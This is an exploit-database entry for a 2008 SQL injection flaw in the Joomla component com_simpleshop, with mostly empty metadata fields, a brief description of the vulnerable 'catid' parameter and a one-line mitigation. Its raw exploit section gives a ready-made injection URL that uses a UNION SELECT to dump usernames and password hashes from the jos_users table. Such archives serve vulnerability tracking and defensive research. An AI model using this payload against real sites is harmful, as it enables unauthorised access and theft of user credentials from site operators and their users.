Joomla ~ option: com_simpleshop ~ SQL Injection

vendor:

com_simpleshop

by:

eXeCuTeR

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_simpleshop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla ~ option: com_simpleshop ~ SQL Injection

This exploit allows an attacker to inject malicious SQL queries into the vulnerable application. The vulnerable parameter is the 'catid' parameter which is not properly sanitized before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@ Joomla ~ option: com_simpleshop ~ SQL Injection

------------------------------------------------------

@ AUTHOR: eXeCuTeR <executerx[at]gmail[dot]com>

------------------------------------------------------

@ HOME: milw0rm.com

------------------------------------------------------

@ DORK: :\

------------------------------------------------------

@ Vuln:
index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
					~EOF~

side note:

same vulnerability listed here: http://milw0rm.com/exploits/5743
but this was sent in back in 02/2008, must of missed it.  Original author: eXeCuTeR.

# milw0rm.com [2008-06-16]